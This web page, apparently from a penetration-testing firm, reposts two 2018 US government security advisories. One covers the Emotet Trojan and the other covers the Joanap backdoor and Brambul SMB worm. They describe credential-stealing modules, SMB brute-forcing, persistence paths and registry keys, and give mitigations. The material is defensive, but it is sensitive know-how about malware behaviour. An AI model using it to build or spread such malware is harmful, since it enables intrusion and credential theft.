TA18-201A: Emotet Malware

Original release date: July 20, 2018 Systems Affected Network Systems Overview Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors. This joint Technical Alert (TA) is the result of Multi-State Information Sharing & Analysis Center (MS-ISAC) analytic efforts, in coordination with the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC). Description Emotet continues to be among the most costly and destructive malware affecting SLTT governments. Its worm-like features result in rapidly spreading network-wide infection, which are difficult to combat. Emotet infections have cost SLTT governments up to $1 million per incident to remediate. Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment. Emotet is disseminated through malspam (emails containing malicious attachments or links) that uses branding familiar to the recipient; it has even been spread using the MS-ISAC name. As of July 2018, the most recent campaigns imitate PayPal receipts, shipping notifications, or “past-due” invoices purportedly from MS-ISAC. Initial infection occurs when a user opens or clicks the malicious download link, PDF, or macro-enabled Microsoft Word document included in the malspam. Once downloaded, Emotet establishes persistence and attempts to propagate the local networks through incorporated spreader modules. Figure 1: Malicious email distributing Emotet Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator. NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. Outlook scraper is a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out additional phishing emails from the compromised accounts. WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients). Figure 2: Emotet infection process To maintain persistence, Emotet injects code into explorer.exe and other running processes. It can also collect sensitive information, including system name, location, and operating system version, and connects to a remote command and control server (C2), usually through a generated 16-letter domain name that ends in “.eu.” Once Emotet establishes a connection with the C2, it reports a new infection, receives configuration data, downloads and runs files, receives instructions, and uploads data to the C2 server. Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. The artifacts usually mimic the names of known executables. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services. When executed, these services attempt to propagate the malware to adjacent systems via accessible administrative shares. Note: it is essential that privileged accounts are not used to log in to compromised systems during remediation as this may accelerate the spread of the malware. Example Filenames and Paths: C:\Users\<username>\AppData \Local\Microsoft\Windows\shedaudio.exe C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe Typical Registry Keys: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run System Root Directories: C:\Windows\11987416.exe C:\Windows\System32\46615275.exe C:\Windows\System32\shedaudio.exe C:\Windows\SysWOW64\f9jwqSbS.exe Impact Negative consequences of Emotet infection include temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization’s reputation. Solution NCCIC and MS-ISAC recommend that organizations adhere to the following general best practices to limit the effect of Emotet and similar malspam: Use Group Policy Object to set a Windows Firewall rule to restrict inbound SMB communication between client systems. If using an alternative host-based intrusion prevention system (HIPS), consider implementing custom modifications for the control of client-to-client SMB communication. At a minimum, create a Group Policy Object that restricts inbound SMB connections to clients originating from clients. Use antivirus programs, with automatic updates of signatures and software, on clients and servers. Apply appropriate patches and updates immediately (after appropriate testing). Implement filters at the email gateway to filter out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall... (more)

Posted on 21 July 2018 12:24 am


TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm

Original release date: May 29, 2018 | Last revised: May 31, 2018 Systems Affected Network systems Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with two families of malware used by the North Korean government: a remote access tool (RAT), commonly known as Joanap; and a Server Message Block (SMB) worm, commonly known as Brambul. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra . FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and enable network exploitation. DHS and FBI are distributing these IP addresses and other IOCs to enable network defense and reduce exposure to any North Korean government malicious cyber activity. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on how to report incidents. If users or administrators detect activity associated with these malware families, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation. See the following links for a downloadable copy of IOCs: IOCs (.csv) IOCs (.stix) NCCIC conducted analysis on four malware samples and produced a Malware Analysis Report (MAR). MAR-10135536.3 – RAT/Worm examines the tactics, techniques, and procedures observed in the malware. Visit MAR-10135536.3 – HIDDEN COBRA RAT/Worm for the report and associated IOCs. Description According to reporting of trusted third parties, HIDDEN COBRA actors have likely been using both Joanap and Brambul malware since at least 2009 to target multiple victims globally and in the United States—including the media, aerospace, financial, and critical infrastructure sectors. Users and administrators should review the information related to Joanap and Brambul from the Operation Blockbuster Destructive Malware Report [1] in conjunction with the IP addresses listed in the .csv and .stix files provided within this alert. Like many of the families of malware used by HIDDEN COBRA actors, Joanap, Brambul, and other previously reported custom malware tools, may be found on compromised network nodes. Each malware tool has different purposes and functionalities. Joanap malware is a fully functional RAT that is able to receive multiple commands, which can be issued by HIDDEN COBRA actors remotely from a command and control server. Joanap typically infects a system as a file dropped by other HIDDEN COBRA malware, which users unknowingly downloaded either when they visit sites compromised by HIDDEN COBRA actors, or when they open malicious email attachments. During analysis of the infrastructure used by Joanap malware, the U.S. Government identified 87 compromised network nodes. The countries in which the infected IP addresses are registered are as follows: Argentina Belgium Brazil Cambodia China Colombia Egypt India Iran Jordan Pakistan Saudi Arabia Spain Sri Lanka Sweden Taiwan Tunisia Malware often infects servers and systems without the knowledge of system users and owners. If the malware can establish persistence, it could move laterally through a victim’s network and any connected networks to infect nodes beyond those identified in this alert. Brambul malware is a brute-force authentication worm that spreads through SMB shares. SMBs enable shared access to files between users on a network. Brambul malware typically spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks. Technical Details Joanap Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device. Other notable functions include file management, process management, creation and deletion of directories, and node management. Analysis indicates the malware encodes data using Rivest Cipher 4 encryption to protect its communication with HIDDEN COBRA actors. Once installed, the malware creates a log entry within the Windows System Directory in a file named mssscardprv.ax. HIDDEN COBRA actors use this file to capture and store victims’ information such as the host IP address, host name, and the current system time. Brambul Brambul malware is a malicious Windows 32-bit SMB worm that functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims’ networks by dropper malware. When executed, the malware attempts to establish contact with victim systems and IP addresses on victims’ local subnets. If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks. Analysts suspect the malware targets insecure or unsecured user accounts and spreads through poorly secured network shares. Once the malware establishes unauthorized access on the victim’s systems, it communicates information about victim’s systems to HIDDEN COBRA actors using malicious email addresses. This information includes the IP address and host name—as well as the username and password—of each victim’s system. HIDDEN COBRA actors can use this information to remotely access a compromised system via the SMB protocol. Analysis of a newer variant of Brambul malware identified the following built-in functions for remote operations: harvesting system information, accepting command-line arguments, generating and executing a suicide script, propagating across the network using SMB, brute forcing SMB login credentials, and generating Simple Mail Transport Protocol email messages containing target host system information. Detection and Response This alert’s IOC files provide HIDDEN COBRA IOCs related to Joanap and Brambul... (more)

Posted on 29 May 2018 3:18 pm



What we do and what we offer.

About penetration tests and about our news.